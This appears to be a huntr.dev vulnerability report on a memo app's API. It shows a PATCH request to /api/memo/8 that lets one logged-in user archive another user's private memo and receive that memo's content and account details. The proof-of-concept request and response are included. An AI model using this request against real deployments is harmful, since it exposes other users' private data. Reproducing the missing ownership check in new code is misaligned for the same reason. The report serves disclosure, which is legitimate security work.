View any content private memos from other users

2022-12-2314:27:27

kevinkien

www.huntr.dev

unauthorized access

private memos

api vulnerability

patch request

demo video

EPSS

0.001

Percentile

21.8%

JSON

Description

User can view any content from private private memos from other users via api

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

Proof of Concept

Login to website in brower 1 with user A.
Login to website in brower 2 with user B.
Example: User B have private nemo with id 8.

With session in brower 1 with user A make a request

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

After user A get a response

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}